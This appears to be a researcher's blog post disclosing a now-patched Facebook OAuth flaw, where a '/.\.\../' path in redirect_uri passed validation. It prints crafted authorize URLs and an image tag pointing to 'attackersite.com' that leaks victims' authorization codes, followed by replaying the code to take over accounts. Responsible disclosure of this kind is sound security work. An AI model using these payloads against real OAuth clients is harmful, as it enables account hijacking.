Well well well, hacking time again :) No much time for big explanation but few weeks ago I was using a little variant of Lassie come home to potentially steal a valid Facebook's access token. In a nutshell reading a blog post of how the great Egor Homakov did hack Github (see Bug 1. Bypass of redirect_uri validation with /../ ) I though how about Facebook :) ?.
Well here is what I found, I have copied a part of my report to Facebook security :
The redirect_uri in the https://graph.facebook.com/oauth/authorize is not validated correctly. I can bypass the redirect_uri validation with /.\.\../. This might result on stealing the authorization code of a Facebook registered OAuth Client. As an example I would use Parse.com (that is owned by Facebook). In https://parse.com/account there is the chance to link an account with Facebook.
Now the correct request is:
https://www.facebook.com/dialog/oauth?response_type=code&client_id=506576959379594&redirect_uri=https%3A%2F%2Fparse.com%2Fauth%2Ffacebook%2Fcallback&state=420c2f177072bc328309aab640fa0e9141b0f7de2c1f7d81&scope=email
but changing the request to:
https://www.facebook.com/dialog/oauth?response_type=code&client_id=506576959379594&redirect_uri=https%3A%2F%2Fparse.com%2Fauth%2Ffacebook%2Fcallback%2F.\.\../.\.\../asanso&state=420c2f177072bc328309aab640fa0e9141b0f7de2c1f7d81&scope=email
(please note the redirect_uri changed to
https%3A%2F%2Fparse.com%2Fauth%2Ffacebook%2Fcallback/.\.\../.\.\../asanso)
will end up to be redirected to
https://parse.com/auth/asanso?code=CODE#_=_
The redirect_uri should instead not being accepted.
In order to see how this can be exploited in general let's assume that https://gist.github.com/ would also be a Facebook OAuth client with a registered redirect_uri of https://gist.github.com/auth/facebook/callback
I would then change the request from
https://graph.facebook.com/oauth/authorize?client_id=213814055461514&redirect_uri=https%3A%2F%2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback&response_type=code
to
https://graph.facebook.com/oauth/authorize?client_id=213814055461514&redirect_uri=https%3A%2F%2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F.\.\../.\.\../.\.\../asanso/a2f05bb7e38ba6af88f8&response_type=code
(please note the redirect_uri=https://gist.github.com/auth/facebook/callback/.\.\../.\.\../.\.\../asanso/a2f05bb7e38ba6af88f8)
Now gist offers some limited html capability but i can use a cross domain resource, like <img>. In the img I can place <img src="http://attackersite.com/"> or <img src="///attackersite.com">
When the user loads this URL, Github 302-redirects him automatically.
Location: https://gist.github.com/auth/facebook/callback/.\.\../.\.\../.\.\../asanso/a2f05bb7e38ba6af88f8?code=CODE
But the user agent loads https://gist.github.com/asanso/a2f05bb7e38ba6af88f8?code=CODE
As soon as we get victim's CODE we can hit https://gist.github.com/auth/facebook/callback?code=CODE and yes :), we are logged into the victim's account and we have access to private gists.
I used an hypothesis of gist being an OAuth client but this would work with any OAuth client that will have the same situation than gist
The answer from Facebook was pretty quick (same for the fix):
Hi,And yep I also got a bounty :)
We have looked into this issue and believe that the vulnerability has been patched. Please re-test the issue and follow up with us if you believe that the patch does not fully resolve the issue.
Security
PS: Nice find! :)
Comments
"https://gist.github.com/auth/facebook/callback/.\.\../.\.\../.\.\../asanso/a2f05bb7e38ba6af88f8"
to
https://gist.github.com/asanso/a2f05bb7e38ba6af88f8